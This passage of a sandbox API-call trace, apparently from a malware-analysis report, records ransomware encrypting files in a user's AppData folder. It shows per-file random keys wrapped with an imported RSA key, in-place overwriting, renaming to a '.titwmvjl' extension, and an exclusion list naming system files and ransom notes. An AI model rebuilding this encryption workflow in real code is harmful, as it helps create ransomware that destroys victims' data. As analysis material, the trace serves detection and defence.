dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503838) returned 1 [0069.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.187] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.188] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.188] GetLastError () returned 0x0 [0069.188] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.188] CryptDestroyKey (hKey=0x503838) returned 1 [0069.188] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.188] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.188] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.188] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.189] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0xdb2d, lpOverlapped=0x0) returned 1 [0069.195] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff24d3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xdb2d, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0xdb2d, lpOverlapped=0x0) returned 1 [0069.197] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.197] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0069.198] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.202] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.203] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.203] CloseHandle (hObject=0x2b4) returned 1 [0069.205] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\1tgr2j oogf6b.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\1tgr2j oogf6b.swf.titwmvjl"), dwFlags=0x1) returned 1 [0069.205] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.205] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.205] lstrcmpW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2=".") returned 1 [0069.205] lstrcmpW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="..") returned 1 [0069.206] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="4YWEQ2GxGpdUwK8PTk.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3" [0069.206] lstrlenW (lpString=".titwmvjl") returned 9 [0069.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3") returned 60 [0069.206] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.206] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3.titwmvjl") returned 69 [0069.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3") returned 60 [0069.206] lstrlenW (lpString=".mp3") returned 4 [0069.206] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.206] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0069.206] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0069.206] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3") returned 60 [0069.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3") returned 60 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="desktop.ini") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="autorun.inf") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="ntuser.dat") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="iconcache.db") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="bootsect.bak") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="boot.ini") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="ntuser.dat.log") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="thumbs.db") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0069.206] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="CRAB-DECRYPT.html") returned -1 [0069.207] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.207] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.207] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="ntldr") returned -1 [0069.207] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="NTDETECT.COM") returned -1 [0069.207] lstrcmpiW (lpString1="4YWEQ2GxGpdUwK8PTk.mp3", lpString2="Bootfont.bin") returned -1 [0069.207] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3") returned 60 [0069.207] lstrlenW (lpString=".mp3") returned 4 [0069.207] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.207] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0069.207] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.207] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.207] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\4yweq2gxgpduwk8ptk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.207] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.208] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.208] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.208] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.209] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.209] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.209] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.209] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.209] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.209] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.210] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.210] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.210] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.210] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.210] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.210] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.210] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.211] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.211] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0069.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.211] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.212] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.212] GetLastError () returned 0x0 [0069.212] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.212] CryptDestroyKey (hKey=0x503338) returned 1 [0069.212] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.212] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.212] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.212] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.213] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033f8) returned 1 [0069.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.213] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.213] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.213] GetLastError () returned 0x0 [0069.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.214] CryptDestroyKey (hKey=0x5033f8) returned 1 [0069.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.214] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.214] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.214] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.214] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x939c, lpOverlapped=0x0) returned 1 [0069.221] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff6c64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x939c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x939c, lpOverlapped=0x0) returned 1 [0069.222] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.222] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0069.223] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.227] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.227] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.227] CloseHandle (hObject=0x2b4) returned 1 [0069.231] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\4yweq2gxgpduwk8ptk.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4YWEQ2GxGpdUwK8PTk.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\4yweq2gxgpduwk8ptk.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0069.231] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.231] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.231] lstrcmpW (lpString1="7ciDl.jpg", lpString2=".") returned 1 [0069.231] lstrcmpW (lpString1="7ciDl.jpg", lpString2="..") returned 1 [0069.231] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="7ciDl.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg" [0069.231] lstrlenW (lpString=".titwmvjl") returned 9 [0069.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg") returned 47 [0069.232] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.232] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg.titwmvjl") returned 56 [0069.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg") returned 47 [0069.232] lstrlenW (lpString=".jpg") returned 4 [0069.232] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.232] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0069.232] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0069.232] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg") returned 47 [0069.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg") returned 47 [0069.232] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="desktop.ini") returned -1 [0069.232] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="autorun.inf") returned -1 [0069.232] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="ntuser.dat") returned -1 [0069.232] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="iconcache.db") returned -1 [0069.232] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="bootsect.bak") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="boot.ini") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="ntuser.dat.log") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="thumbs.db") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="KRAB-DECRYPT.html") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="CRAB-DECRYPT.html") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="ntldr") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="NTDETECT.COM") returned -1 [0069.233] lstrcmpiW (lpString1="7ciDl.jpg", lpString2="Bootfont.bin") returned -1 [0069.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg") returned 47 [0069.233] lstrlenW (lpString=".jpg") returned 4 [0069.233] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.233] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jpg ") returned 5 [0069.233] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.234] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.234] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7cidl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.234] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.234] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.235] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.235] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.235] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.236] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.236] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.236] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.236] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.236] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.236] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.236] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.237] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.237] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.237] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.237] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.237] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.237] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.238] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.238] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0069.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.238] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.239] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.239] GetLastError () returned 0x0 [0069.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.239] CryptDestroyKey (hKey=0x503378) returned 1 [0069.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.239] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.239] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.240] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5032f8) returned 1 [0069.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.240] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.240] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.240] GetLastError () returned 0x0 [0069.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.241] CryptDestroyKey (hKey=0x5032f8) returned 1 [0069.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.241] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.241] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.241] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.241] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x16add, lpOverlapped=0x0) returned 1 [0069.248] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe9523, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x16add, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x16add, lpOverlapped=0x0) returned 1 [0069.250] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.250] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, 